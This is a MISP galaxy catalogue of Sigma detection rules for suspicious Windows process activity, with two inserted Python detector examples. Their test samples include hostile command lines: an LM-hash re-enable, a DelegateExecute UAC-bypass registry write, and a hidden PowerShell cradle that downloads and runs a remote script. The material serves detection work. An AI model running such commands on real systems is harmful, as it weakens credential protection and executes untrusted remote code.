File Download Via Bitsadmin To A Suspicious Target Folder has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="BITS Jobs - T1197" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Rename System Utilities - T1036.003" with estimative-language:likelihood-probability="almost-certain"

Table 10358. Table References

Links

https://isc.sans.edu/diary/22264

https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/

https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin

https://blog.talosintelligence.com/breaking-the-silence-recent-truebot-activity/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bitsadmin_download_susp_targetfolder.yml

MsiExec Web Install

Detects suspicious msiexec process starts with web addresses as a parameter

The tag is: misp-galaxy:sigma-rules="MsiExec Web Install"

MsiExec Web Install has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Msiexec - T1218.007" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

Table 10359. Table References

Links

https://blog.trendmicro.com/trendlabs-security-intelligence/attack-using-windows-installer-msiexec-exe-leads-lokibot/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msiexec_web_install.yml

Suspicious PowerShell Invocation From Script Engines

Detects suspicious powershell invocations from interpreters or unusual programs

The tag is: misp-galaxy:sigma-rules="Suspicious PowerShell Invocation From Script Engines"

Suspicious PowerShell Invocation From Script Engines has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 10360. Table References

Links

https://www.securitynewspaper.com/2017/03/20/attackers-leverage-excel-powershell-dns-latest-non-malware-attack/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_script_engine_parent.yml

Suspicious Invoke-WebRequest Execution With DirectIP

Detects calls to PowerShell with Invoke-WebRequest cmdlet using direct IP access

The tag is: misp-galaxy:sigma-rules="Suspicious Invoke-WebRequest Execution With DirectIP"

Suspicious Invoke-WebRequest Execution With DirectIP has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

Table 10361. Table References

Links

https://www.huntress.com/blog/critical-vulnerabilities-in-papercut-print-management-software

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_invoke_webrequest_direct_ip.yml

Potential Persistence Via Netsh Helper DLL

Detects the execution of netsh with "add helper" flag in order to add a custom helper DLL. This technique can be abused to add a malicious helper DLL that can be used as a persistence proxy that gets called when netsh.exe is executed.

The tag is: misp-galaxy:sigma-rules="Potential Persistence Via Netsh Helper DLL"

Potential Persistence Via Netsh Helper DLL has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Netsh Helper DLL - T1546.007" with estimative-language:likelihood-probability="almost-certain"

Table 10362. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.007/T1546.007.md

https://github.com/outflanknl/NetshHelperBeacon

https://web.archive.org/web/20160928212230/https://www.adaptforward.com/2016/09/using-netshell-to-execute-evil-dlls-and-persist-on-a-host/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_netsh_helper_dll_persistence.yml

File With Suspicious Extension Downloaded Via Bitsadmin

Detects usage of bitsadmin downloading a file with a suspicious extension

The tag is: misp-galaxy:sigma-rules="File With Suspicious Extension Downloaded Via Bitsadmin"

File With Suspicious Extension Downloaded Via Bitsadmin has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="BITS Jobs - T1197" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Rename System Utilities - T1036.003" with estimative-language:likelihood-probability="almost-certain"

Table 10364. Table References

Links

https://isc.sans.edu/diary/22264

https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/

https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bitsadmin_download_susp_extensions.yml

Potential Adplus.EXE Abuse

Detects execution of "AdPlus.exe", a binary that is part of the Windows SDK that can be used as a LOLBIN in order to dump process memory and execute arbitrary commands.

The tag is: misp-galaxy:sigma-rules="Potential Adplus.EXE Abuse"

Potential Adplus.EXE Abuse has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"

Table 10365. Table References

Links

https://twitter.com/nas_bench/status/1534915321856917506

https://twitter.com/nas_bench/status/1534916659676422152

https://lolbas-project.github.io/lolbas/OtherMSBinaries/Adplus/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_adplus_memory_dump.yml

Conhost Spawned By Uncommon Parent Process

Detects when the Console Window Host (conhost.exe) process is spawned by an uncommon parent process, which could be indicative of potential code injection activity.

The tag is: misp-galaxy:sigma-rules="Conhost Spawned By Uncommon Parent Process"

Conhost Spawned By Uncommon Parent Process has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Command and Scripting Interpreter - T1059" with estimative-language:likelihood-probability="almost-certain"

Table 10366. Table References

Links

https://www.elastic.co/guide/en/security/current/conhost-spawned-by-suspicious-parent-process.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_conhost_uncommon_parent.yml

Potential SPN Enumeration Via Setspn.EXE

Detects service principal name (SPN) enumeration used for Kerberoasting

The tag is: misp-galaxy:sigma-rules="Potential SPN Enumeration Via Setspn.EXE"

Potential SPN Enumeration Via Setspn.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Kerberoasting - T1558.003" with estimative-language:likelihood-probability="almost-certain"

Table 10367. Table References

Links

https://web.archive.org/web/20200329173843/https://p16.praetorian.com/blog/how-to-use-kerberoasting-t1208-for-privilege-escalation

https://www.praetorian.com/blog/how-to-use-kerberoasting-t1208-for-privilege-escalation/?edition=2019

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_setspn_spn_enumeration.yml

Execution Of Non-Existing File

Checks whether the image specified in a process creation event is not a full, absolute path (caused by process ghosting or other unorthodox methods to start a process)

The tag is: misp-galaxy:sigma-rules="Execution Of Non-Existing File"

Table 10368. Table References

Links

https://pentestlaboratories.com/2021/12/08/process-ghosting/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_image_missing.yml

Suspicious Processes Spawned by WinRM

Detects suspicious processes, including shells, spawned from the WinRM host process

The tag is: misp-galaxy:sigma-rules="Suspicious Processes Spawned by WinRM"

Suspicious Processes Spawned by WinRM has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Exploit Public-Facing Application - T1190" with estimative-language:likelihood-probability="almost-certain"

Table 10369. Table References

Links

Internal Research

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_winrm_susp_child_process.yml

New User Created Via Net.EXE With Never Expire Option

Detects creation of local users via the net.exe command with the option "never expire"

The tag is: misp-galaxy:sigma-rules="New User Created Via Net.EXE With Never Expire Option"

New User Created Via Net.EXE With Never Expire Option has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Local Account - T1136.001" with estimative-language:likelihood-probability="almost-certain"

Table 10370. Table References

Links

https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_net_user_add_never_expire.yml

Forfiles.EXE Child Process Masquerading

Detects the execution of "forfiles" from a non-default location, in order to potentially spawn a custom "cmd.exe" from the current working directory.

The tag is: misp-galaxy:sigma-rules="Forfiles.EXE Child Process Masquerading"

Forfiles.EXE Child Process Masquerading has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Masquerading - T1036" with estimative-language:likelihood-probability="almost-certain"

Table 10371. Table References

Links

https://www.hexacorn.com/blog/2023/12/31/1-little-known-secret-of-forfiles-exe/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_forfiles_child_process_masquerading.yml

Suspicious Cabinet File Execution Via Msdt.EXE

Detects execution of msdt.exe using the "cab" flag which could indicate suspicious diagcab files with embedded answer files leveraging CVE-2022-30190

The tag is: misp-galaxy:sigma-rules="Suspicious Cabinet File Execution Via Msdt.EXE"

Suspicious Cabinet File Execution Via Msdt.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Indirect Command Execution - T1202" with estimative-language:likelihood-probability="almost-certain"

Table 10372. Table References

Links

https://twitter.com/nas_bench/status/1537896324837781506

https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-9015912909545e72ed42cbac4d1e96295e8964579c406d23fd9c47a8091576a0

https://irsl.medium.com/the-trouble-with-microsofts-troubleshooters-6e32fc80b8bd

https://github.com/GossiTheDog/ThreatHunting/blob/e85884abbf05d5b41efc809ea6532b10b45bd05c/AdvancedHuntingQueries/DogWalk-DiagCab

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msdt_susp_cab_options.yml

HackTool - Hydra Password Bruteforce Execution

Detects command line parameters used by the Hydra password guessing hack tool

The tag is: misp-galaxy:sigma-rules="HackTool - Hydra Password Bruteforce Execution"

HackTool - Hydra Password Bruteforce Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Brute Force - T1110" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Password Guessing - T1110.001" with estimative-language:likelihood-probability="almost-certain"

Table 10374. Table References

Links

https://github.com/vanhauser-thc/thc-hydra

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_hydra.yml

Potential Configuration And Service Reconnaissance Via Reg.EXE

Detects the usage of "reg.exe" in order to query reconnaissance information from the registry. Adversaries may interact with the Windows registry to gather information about credentials, the system, configuration, and installed software.

The tag is: misp-galaxy:sigma-rules="Potential Configuration And Service Reconnaissance Via Reg.EXE"

Potential Configuration And Service Reconnaissance Via Reg.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Query Registry - T1012" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="System Service Discovery - T1007" with estimative-language:likelihood-probability="almost-certain"

Table 10375. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1012/T1012.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_query_registry.yml

Remote XSL Execution Via Msxsl.EXE

Detects the execution of the "msxsl" binary with an "http" keyword in the command line. This might indicate a potential remote execution of XSL files.

The tag is: misp-galaxy:sigma-rules="Remote XSL Execution Via Msxsl.EXE"

Remote XSL Execution Via Msxsl.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="XSL Script Processing - T1220" with estimative-language:likelihood-probability="almost-certain"

Table 10376. Table References

Links

https://lolbas-project.github.io/lolbas/OtherMSBinaries/Msxsl/

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1220/T1220.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msxsl_remote_execution.yml

Suspicious Program Names

Detects suspicious patterns in program names or folders that are often found in malicious samples or hacktools

The tag is: misp-galaxy:sigma-rules="Suspicious Program Names"

Suspicious Program Names has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Command and Scripting Interpreter - T1059" with estimative-language:likelihood-probability="almost-certain"

Table 10377. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1560.001/T1560.001.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_progname.yml

HackTool - Dumpert Process Dumper Execution

Detects the use of Dumpert process dumper, which dumps the lsass.exe process memory

The tag is: misp-galaxy:sigma-rules="HackTool - Dumpert Process Dumper Execution"

HackTool - Dumpert Process Dumper Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"

Table 10378. Table References

Links

https://github.com/outflanknl/Dumpert

https://unit42.paloaltonetworks.com/actors-still-exploiting-sharepoint-vulnerability/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_dumpert.yml

HTML Help HH.EXE Suspicious Child Process

Detects a suspicious child process of Microsoft HTML Help (HH.exe)

The tag is: misp-galaxy:sigma-rules="HTML Help HH.EXE Suspicious Child Process"

HTML Help HH.EXE Suspicious Child Process has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation - T1047" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Visual Basic - T1059.005" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="JavaScript - T1059.007" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Compiled HTML File - T1218.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Regsvr32 - T1218.010" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Rundll32 - T1218.011" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Phishing - T1566" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Spearphishing Attachment - T1566.001" with estimative-language:likelihood-probability="almost-certain"

Table 10379. Table References

Links

https://www.zscaler.com/blogs/security-research/unintentional-leak-glimpse-attack-vectors-apt37

https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/higaisa-or-winnti-apt-41-backdoors-old-and-new/

https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-27939090904026cc396b0b629c8e4314acd6f5dac40a676edbc87f4567b47eb7

https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/chm-badness-delivers-a-banking-trojan/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hh_html_help_susp_child_process.yml

Security Privileges Enumeration Via Whoami.EXE

Detects a whoami.exe executed with the /priv command line flag instructing the tool to show all current user privileges. This is often used after a privilege escalation attempt.

The tag is: misp-galaxy:sigma-rules="Security Privileges Enumeration Via Whoami.EXE"

Security Privileges Enumeration Via Whoami.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"

Table 10380. Table References

Links

https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/whoami

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_whoami_priv_discovery.yml

Enable LM Hash Storage - ProcCreation

Detects changes to the "NoLMHash" registry value that allow Windows to store LM hashes again. Setting this value to 0 (REG_DWORD) lets Windows store a LAN Manager hash of a password in Active Directory and in the local SAM database; the LM hash is trivially crackable, which is why storage is disabled by default.

The tag is: misp-galaxy:sigma-rules="Enable LM Hash Storage - ProcCreation"

Enable LM Hash Storage - ProcCreation has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"

Table 10381. Table References

Links

https://learn.microsoft.com/en-us/troubleshoot/windows-server/windows-security/prevent-windows-store-lm-hash-password

https://www.sans.org/blog/protecting-privileged-domain-accounts-lm-hashes-the-good-the-bad-and-the-ugly/

https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-347a

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_nolmhash.yml

Suspicious Reg Add Open Command

Detects "reg add" command lines that write a DelegateExecute value under a shell\open\command key, a well-known UAC bypass primitive. Threat actors used this key immediately before dumping the SAM, SECURITY and SYSTEM registry hives.

The tag is: misp-galaxy:sigma-rules="Suspicious Reg Add Open Command"

Suspicious Reg Add Open Command has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="OS Credential Dumping - T1003" with estimative-language:likelihood-probability="almost-certain"

Table 10382. Table References

Links

https://thedfirreport.com/2021/12/13/diavol-ransomware/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_open_command.yml
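Both of the preceding rules key on a "reg add" command line that touches one sensitive value: NoLMHash set to 0, and a DelegateExecute value under a shell\open\command key. The Python below is an added example, not code from this page or from the Sigma project. It tokenises a Windows command line, extracts key, value name, type and data from a "reg add" invocation (handling /v, /ve, /t and /d in any order), and applies a simplified version of both checks to constructed process-creation events. The event field names (Image, CommandLine) follow Sysmon, the sample command lines are made up, and the matching logic is an approximation of the real rules rather than a copy.

```python
import re

# Constructed sample events (Sysmon-style field names); none are taken from the page.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\reg.exe",
     "CommandLine": r'reg add "HKLM\SYSTEM\CurrentControlSet\Control\Lsa" /v NoLMHash /t REG_DWORD /d 0 /f'},
    {"Image": r"C:\Windows\System32\reg.exe",
     "CommandLine": r'reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa /v NoLMHash /t REG_DWORD /d 1 /f'},
    {"Image": r"C:\Windows\System32\reg.exe",
     "CommandLine": r'reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /v DelegateExecute /t REG_SZ /d "" /f'},
    {"Image": r"C:\Windows\System32\reg.exe",
     "CommandLine": r'reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run'},
]


def win_split(cmdline):
    """Minimal Windows-style tokenizer: whitespace separates arguments,
    double quotes group and are then dropped (enough for reg.exe syntax)."""
    return [t.replace('"', "") for t in re.findall(r'(?:[^\s"]+|"[^"]*")+', cmdline)]


def parse_reg_add(cmdline):
    """Return {key, value_name, type, data} for a 'reg add' command line, else None.
    Flags may appear in any order; the key is kept exactly as written."""
    toks = win_split(cmdline)
    if len(toks) < 3:
        return None
    exe = toks[0].lower().rsplit("\\", 1)[-1]
    if exe not in ("reg", "reg.exe") or toks[1].lower() != "add":
        return None
    parsed = {"key": toks[2], "value_name": None, "type": None, "data": None}
    i = 3
    while i < len(toks):
        flag = toks[i].lower()
        if flag == "/ve":
            parsed["value_name"] = ""          # the key's (Default) value
        elif flag in ("/v", "/t", "/d") and i + 1 < len(toks):
            parsed[{"/v": "value_name", "/t": "type", "/d": "data"}[flag]] = toks[i + 1]
            i += 1
        i += 1
    return parsed


def check_nolmhash(parsed):
    """Simplified 'Enable LM Hash Storage': NoLMHash under ...\Control\Lsa set to 0.
    The hive may be spelled HKLM or HKEY_LOCAL_MACHINE, so only the key suffix is compared."""
    return (parsed is not None
            and parsed["key"].lower().rstrip("\\").endswith(r"\control\lsa")
            and (parsed["value_name"] or "").lower() == "nolmhash"
            and (parsed["data"] or "").lower() in ("0", "0x0"))


def check_delegate_execute(parsed):
    """Simplified 'Suspicious Reg Add Open Command': a DelegateExecute value written
    under any ...\shell\open\command key."""
    return (parsed is not None
            and (parsed["value_name"] or "").lower() == "delegateexecute"
            and r"\shell\open\command" in parsed["key"].lower())


RULES = [("Enable LM Hash Storage - ProcCreation", check_nolmhash),
         ("Suspicious Reg Add Open Command", check_delegate_execute)]


def run_rules(events):
    """Return [(event_index, rule_name)] for every event that matches a rule."""
    hits = []
    for idx, ev in enumerate(events):
        parsed = parse_reg_add(ev["CommandLine"])
        for name, check in RULES:
            if check(parsed):
                hits.append((idx, name))
    return hits


if __name__ == "__main__":
    for idx, name in run_rules(SAMPLE_EVENTS):
        print(f"[{name}] {SAMPLE_EVENTS[idx]['CommandLine']}")
```

Writes made through other tooling (PowerShell, direct registry API calls, remote registry) never produce such a command line; catching those needs registry-event telemetry rather than process creation, which is why the rule title carries the "ProcCreation" qualifier.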

Time Travel Debugging Utility Usage

Detects usage of Time Travel Debugging Utility. Adversaries can execute malicious processes and dump processes, such as lsass.exe, via tttracer.exe.

The tag is: misp-galaxy:sigma-rules="Time Travel Debugging Utility Usage"

Time Travel Debugging Utility Usage has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"

Table 10383. Table References

Links

https://twitter.com/oulusoyum/status/1191329746069655553

https://lolbas-project.github.io/lolbas/Binaries/Tttracer/

https://twitter.com/mattifestation/status/1196390321783025666

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_tttracer_mod_load.yml

Esentutl Steals Browser Information

One way Qbot steals sensitive information is by extracting browser data from Internet Explorer and Microsoft Edge by using the built-in utility esentutl.exe

The tag is: misp-galaxy:sigma-rules="Esentutl Steals Browser Information"

Esentutl Steals Browser Information has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Data from Local System - T1005" with estimative-language:likelihood-probability="almost-certain"

Table 10384. Table References

Links

https://thedfirreport.com/2022/10/31/follina-exploit-leads-to-domain-compromise/

https://redcanary.com/threat-detection-report/threats/qbot/

https://thedfirreport.com/2022/02/07/qbot-likes-to-move-it-move-it/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_esentutl_webcache.yml

HackTool - CrackMapExec Execution

This rule detects common flag combinations used by CrackMapExec, so that its use is caught even when the binary has been renamed or replaced.

The tag is: misp-galaxy:sigma-rules="HackTool - CrackMapExec Execution"

HackTool - CrackMapExec Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation - T1047" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Scheduled Task/Job - T1053" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Brute Force - T1110" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Password Policy Discovery - T1201" with estimative-language:likelihood-probability="almost-certain"

Table 10385. Table References

Links

https://www.infosecmatter.com/crackmapexec-module-library/?cmem=mssql-mimikatz

https://www.mandiant.com/resources/telegram-malware-iranian-espionage

https://www.infosecmatter.com/crackmapexec-module-library/?cmem=smb-pe_inject

https://mpgn.gitbook.io/crackmapexec/smb-protocol/authentication/checking-credentials-local

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_crackmapexec_execution.yml

Change PowerShell Policies to an Insecure Level

Detects changing the PowerShell script execution policy to a potentially insecure level using the "-ExecutionPolicy" flag.

The tag is: misp-galaxy:sigma-rules="Change PowerShell Policies to an Insecure Level"

Change PowerShell Policies to an Insecure Level has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 10386. Table References

Links

https://adsecurity.org/?p=2604

https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.security/set-executionpolicy?view=powershell-7.1

https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_execution_policies?view=powershell-7.1

https://thedfirreport.com/2021/11/01/from-zero-to-domain-admin/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_set_policies_to_unsecure_level.yml
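The "-ExecutionPolicy" flag is rarely typed out in full by attackers. powershell.exe accepts any unambiguous prefix of its switch names (-ex, -exec, -executionpol) as well as the short alias -ep, and both "-" and "/" as the switch character, so a detection that only matches the literal string "-ExecutionPolicy" misses most real command lines. The Python below is an added example, not code from this page or from Sigma: it tokenises the command line, recognises every spelling of the switch, and flags the Bypass and Unrestricted values; as an extension beyond the flag itself it also looks for Set-ExecutionPolicy inside an inline -Command. The sample command lines are constructed and the set of policies treated as insecure is my choice.

```python
import re

INSECURE_POLICIES = {"bypass", "unrestricted"}   # my choice; add "remotesigned" if your baseline is stricter


def win_split(cmdline):
    """Whitespace tokenizer that keeps quoted runs together and drops the quotes."""
    return [t.replace('"', "") for t in re.findall(r'(?:[^\s"]+|"[^"]*")+', cmdline)]


def is_execution_policy_switch(tok):
    """True for every spelling powershell.exe accepts for -ExecutionPolicy: the alias
    -ep and any prefix of 'executionpolicy' of at least two characters starting with
    'ex'. A bare -e is -EncodedCommand and must not match."""
    if len(tok) < 3 or tok[0] not in "-/":
        return False
    key = tok[1:].lower()
    if key == "ep":
        return True
    return key.startswith("ex") and "executionpolicy".startswith(key)


def insecure_execution_policy(cmdline):
    """Return the insecure policy (lowercase) a command line asks for, or None."""
    toks = win_split(cmdline)
    for i in range(len(toks) - 1):
        if is_execution_policy_switch(toks[i]) and toks[i + 1].lower() in INSECURE_POLICIES:
            return toks[i + 1].lower()
    # Extension: the same policy set from an inline -Command / -c via the cmdlet.
    m = re.search(r"set-executionpolicy\s+(?:-executionpolicy\s+)?([A-Za-z]+)", cmdline, re.IGNORECASE)
    if m and m.group(1).lower() in INSECURE_POLICIES:
        return m.group(1).lower()
    return None


# Constructed command lines; none are taken from the page.
SAMPLES = [
    r'powershell.exe -ExecutionPolicy Bypass -File C:\Users\Public\run.ps1',
    'powershell -nop -w hidden -ep bypass -c "IEX (New-Object Net.WebClient).DownloadString(\'http://192.0.2.10/s\')"',
    r'pwsh.exe /exec Unrestricted -c Get-Process',
    r'powershell.exe -executionpol remotesigned -File deploy.ps1',
    r'powershell.exe -Command "Set-ExecutionPolicy Restricted -Scope CurrentUser"',
    r'powershell.exe -Command "Set-ExecutionPolicy -ExecutionPolicy Bypass -Scope Process -Force"',
    r'powershell.exe -e Bypass',
]


def scan(cmdlines):
    """Return [(index, policy)] for every command line requesting an insecure policy."""
    return [(i, p) for i, cl in enumerate(cmdlines) if (p := insecure_execution_policy(cl))]


if __name__ == "__main__":
    for i, policy in scan(SAMPLES):
        print(f"{policy:<12} {SAMPLES[i]}")
```

Deployment tooling (configuration management agents, software distribution scripts) legitimately runs with -ExecutionPolicy Bypass all day, so the parent process and the script path are what separate an alert from noise; the flag alone is a weak signal.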

DumpStack.log Defender Evasion

Detects the use of the filename DumpStack.log to evade Microsoft Defender

The tag is: misp-galaxy:sigma-rules="DumpStack.log Defender Evasion"

Table 10387. Table References

Links

https://twitter.com/mrd0x/status/1479094189048713219

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_dumpstack_log_evasion.yml

Files Added To An Archive Using Rar.EXE

Detects usage of "rar" to add files to an archive for potential compression. An adversary may compress data (e.g. sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network.

The tag is: misp-galaxy:sigma-rules="Files Added To An Archive Using Rar.EXE"

Files Added To An Archive Using Rar.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Archive via Utility - T1560.001" with estimative-language:likelihood-probability="almost-certain"

Table 10388. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1560.001/T1560.001.md

https://eqllib.readthedocs.io/en/latest/analytics/1ec33c93-3d0b-4a28-8014-dbdaae5c60ae.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rar_compress_data.yml

Rundll32 Execution Without Parameters

Detects rundll32 execution without parameters as observed when running Metasploit windows/smb/psexec exploit module

The tag is: misp-galaxy:sigma-rules="Rundll32 Execution Without Parameters"

Rundll32 Execution Without Parameters has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="SMB/Windows Admin Shares - T1021.002" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Lateral Tool Transfer - T1570" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Service Execution - T1569.002" with estimative-language:likelihood-probability="almost-certain"

Table 10389. Table References

Links

https://bczyz1.github.io/2021/01/30/psexec.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_without_parameters.yml

Potential Register_App.Vbs LOLScript Abuse

Detects potential abuse of the "register_app.vbs" script that is part of the Windows SDK. The script offers the capability to register new VSS/VDS Provider as a COM+ application. Attackers can use this to install malicious DLLs for persistence and execution.

The tag is: misp-galaxy:sigma-rules="Potential Register_App.Vbs LOLScript Abuse"

Potential Register_App.Vbs LOLScript Abuse has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

Table 10390. Table References

Links

https://twitter.com/sblmsrsn/status/1456613494783160325?s=20

https://github.com/microsoft/Windows-classic-samples/blob/7cbd99ac1d2b4a0beffbaba29ea63d024ceff700/Samples/Win7Samples/winbase/vss/vsssampleprovider/register_app.vbs

